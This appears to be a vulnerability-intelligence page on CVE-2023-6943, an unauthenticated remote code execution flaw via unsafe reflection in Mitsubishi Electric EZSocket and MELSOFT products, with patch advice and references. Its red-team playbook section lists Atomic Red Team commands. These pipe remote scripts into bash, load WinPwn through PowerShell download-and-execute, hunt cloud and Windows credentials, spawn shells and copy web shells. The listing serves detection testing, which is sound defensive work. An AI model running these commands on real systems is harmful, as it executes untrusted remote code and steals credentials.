CVE-2023-6943
Overview
This vulnerability is an unsafe reflection flaw (CWE-470) arising from the use of externally-controlled input to select classes or code in Mitsubishi Electric Corporation EZSocket and related software. The root cause is the improper validation of input parameters that determine which classes or libraries are loaded during RPC communication. Affected components include EZSocket versions 3.0 to 5.92 and multiple MELSOFT products that utilize RPC mechanisms for inter-process communication.
Vulnerability Description
Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 to 5.92, GT Designer3 Version1(GOT1000) versions 1.325P and prior, GT Designer3 Version1(GOT2000) versions 1.320J and prior, GX Works2 versions 1.11M to 1.626C, GX Works3 versions 1.106L and prior, MELSOFT Navigator versions 1.04E to 2.102G, MT Works2 versions 1.190Y and prior, MX Component versions 4.00A to 5.007H and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to execute a malicious code by RPC with a path to a malicious library while connected to the products.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on affected systems by sending crafted RPC requests that load malicious libraries. No user interaction or prior authentication is required (CVSS vector AV:N/AC:L/PR:N/UI:N). Successful exploitation can lead to full system compromise, data manipulation, or disruption of industrial control processes, posing severe operational and security risks to critical infrastructure environments.
Solution
Mitsubishi Electric has released security updates addressing this vulnerability in their advisory 2023-020_en.pdf. Users should upgrade EZSocket to versions later than 5.92 and update affected MELSOFT products to versions beyond those listed as vulnerable. Detailed patch instructions and version-specific fixes are available in the vendor advisory (https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-020_en.pdf). No workarounds are recommended; applying the official patches is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from the use of externally-controlled input to select classes or code, commonly referred to as 'unsafe reflection.' This issue is particularly prevalent in several products from Mitsubishi Electric Corporation, including EZSocket, GT Designer3, GX Works2, GX Works3, MELSOFT Navigator, and others. The core of the vulnerability lies in the ability of an attacker to manipulate remote procedure calls (RPC) to execute arbitrary code by providing a path to a malicious library. This exploitation occurs without the need for authentication, significantly increasing the risk of unauthorized access and control over affected systems.
Attack vectors for this vulnerability are varied and can be executed remotely, making them particularly dangerous. An attacker could leverage social engineering techniques to trick a user into connecting to a malicious server or could directly target exposed services that utilize the affected products. Once the connection is established, the attacker can send specially crafted RPC requests that include paths to malicious libraries. This could lead to the execution of arbitrary code on the vulnerable system, allowing the attacker to gain control, exfiltrate sensitive data, or disrupt operations. The ease of exploitation, combined with the lack of authentication requirements, makes this vulnerability a prime target for malicious actors.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Mitsubishi Electric's products for critical infrastructure and industrial control systems. The potential for remote code execution poses significant business risks, including operational disruptions, financial losses, and reputational damage. For instance, if an attacker successfully exploits this vulnerability in a manufacturing environment, they could halt production lines, corrupt data, or even cause physical damage to machinery. Additionally, the breach of sensitive operational data could lead to compliance violations and legal repercussions, further exacerbating the financial impact on the organization.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, regular vulnerability assessments and penetration testing should be conducted to identify any instances of the affected products within the network. Organizations should also maintain an up-to-date inventory of all software and hardware assets to ensure that any vulnerable versions are identified and remediated promptly. Applying patches and updates provided by Mitsubishi Electric is crucial, as these updates often contain fixes for known vulnerabilities. Furthermore, network segmentation can help limit the exposure of critical systems to potential attackers, while robust monitoring and logging practices can aid in the early detection of suspicious activity.
In conclusion, the vulnerability associated with unsafe reflection in Mitsubishi Electric's products presents a significant threat to organizations leveraging these technologies. The potential for remote code execution without authentication creates an attractive target for attackers, leading to severe operational and financial consequences. By adopting proactive detection and mitigation strategies, organizations can better protect themselves against the exploitation of this vulnerability and safeguard their critical infrastructure from malicious actors.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Mitsubishielectric | Ezsocket | All |
cpe:2.3:a:mitsubishielectric:ezsocket:*:*:*:*:*:*:*:*
|
|
|
Mitsubishielectric | Fr Configurator2 | All |
cpe:2.3:a:mitsubishielectric:fr_configurator2:*:*:*:*:*:*:*:*
|
|
|
Mitsubishielectric | Got1000 | All |
cpe:2.3:a:mitsubishielectric:got1000:*:*:*:*:*:*:*:*
|
|
|
Mitsubishielectric | Got2000 | All |
cpe:2.3:a:mitsubishielectric:got2000:*:*:*:*:*:*:*:*
|
|
|
Mitsubishielectric | Gx Works2 | All |
cpe:2.3:a:mitsubishielectric:gx_works2:*:*:*:*:*:*:*:*
|
|
|
Mitsubishielectric | Gx Works3 | All |
cpe:2.3:a:mitsubishielectric:gx_works3:*:*:*:*:*:*:*:*
|
|
|
Mitsubishielectric | Mc Works64 | All |
cpe:2.3:a:mitsubishielectric:mc_works64:*:*:*:*:*:*:*:*
|
|
|
Mitsubishielectric | Melsoft Navigator | All |
cpe:2.3:a:mitsubishielectric:melsoft_navigator:*:*:*:*:*:*:*:*
|
|
|
Mitsubishielectric | Mt Works2 | All |
cpe:2.3:a:mitsubishielectric:mt_works2:*:*:*:*:*:*:*:*
|
|
|
Mitsubishielectric | Mx Component | All |
cpe:2.3:a:mitsubishielectric:mx_component:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-138 | Reflection Injection |
45%
|
— | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-6943 |
| mitsubishielectric.com |
GitHub CVE
vendor-advisory
|
https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-020_en.pdf |
| jvn.jp |
GitHub CVE
government-resource
|
https://jvn.jp/vu/JVNVU95103362 |
| cisa.gov |
GitHub CVE
government-resource
|
https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-02 |